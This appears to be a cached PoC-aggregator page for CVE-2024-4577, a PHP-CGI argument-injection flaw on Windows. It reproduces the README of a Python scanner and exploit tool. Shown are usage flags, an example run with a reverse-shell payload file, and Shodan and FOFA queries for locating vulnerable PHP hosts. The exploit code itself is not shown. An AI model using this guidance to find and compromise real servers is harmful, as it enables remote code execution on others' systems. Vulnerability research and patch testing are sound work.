CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Source

https://github.com/longhoangth18/CVE-2024-4577

Associated Vulnerability

Title:Argument Injection in PHP-CGI (CVE-2024-4577)
Description:In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

Readme

# 🚀 CVE-2024-4577: PHP CGI Argument Injection Scanner and Exploit

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Python 3.6+](https://img.shields.io/badge/python-3.6+-blue.svg)](https://www.python.org/downloads/)
[![CVSS Score](https://img.shields.io/badge/CVSS-9.8-critical)](https://www.first.org/cvss/)

## 🛡️ Overview
![image](https://github.com/user-attachments/assets/af8c5025-9e39-42a9-8799-626673463c83)

CVE-2024-4577 is a **critical vulnerability** affecting PHP applications that utilize the **Common Gateway Interface (CGI)**. This tool serves as both a **scanner** and an **exploit**, enabling cybersecurity professionals to:

- Detect PHP CGI Argument Injection flaws
- Exploit vulnerabilities leading to **Remote Code Execution (RCE)**
- Execute arbitrary PHP code on vulnerable systems

## 🔑 Key Features

- **🔍 Vulnerability Detection:** Robust scanning process to identify susceptible PHP applications
- **💥 Exploit Functionality:** Customizable payloads for targeted vulnerability exploitation
- **🔧 Flexible Payload Management:** Specify PHP payload files for post-exploitation execution
- **👥 User-Friendly Interface:** Simple command-line options with clear, actionable output

## 📦 Installation

```bash
# Clone the repository
git clone https://github.com/your-username/CVE-2024-4577-scanner.git

# Navigate to the project directory
cd CVE-2024-4577-scanner

# Install required dependencies
pip install -r requirements.txt
```

## 📖 Usage

Ensure you have **Python 3** installed on your system. Use the following command structure:

```bash
python3 CVE-2024-4577.py [-h] -t TARGET_FILE [-s] [-e] [-p PAYLOAD_FILE]
```

### Arguments:

- `-h, --help`: Show help message and exit
- `-t TARGET_FILE, --target-file TARGET_FILE`: File containing target URLs (required)
- `-s, --scan`: Perform vulnerability scan only
- `-e, --exploit`: Attempt to exploit the vulnerability
- `-p PAYLOAD_FILE, --payload-file PAYLOAD_FILE`: PHP payload file for exploitation

### Example:

```bash
python3 CVE-2024-4577.py -t targetsite.txt -e -p rev_shell.php
```

## 🔍 Discovering Vulnerable Hosts

Utilize powerful search engines to identify potentially vulnerable hosts:

### 🌐 Shodan Query

Search for servers running PHP versions 8.1, 8.2, and 8.3:

```
server: PHP 8.1, server: PHP 8.2, server: PHP 8.3, html:"phpinfo"
```

### 🌐 FOFA Query

```
protocol="http" && (header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3")
```

## ⚠️ Disclaimer

This tool is intended for authorized security testing and research purposes only. Ensure you have explicit permission before scanning or attempting to exploit any systems you do not own or have the right to test.

## 📞 Support

If you encounter any issues or have questions, please file an issue on the GitHub issue tracker.

---

File Snapshot


 [4.0K]  /data/pocs/658e0611507817be9d5d375ba238d0eb7fed84aa
├── [4.5K]  CVE-2024-4577.py
└── [2.9K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!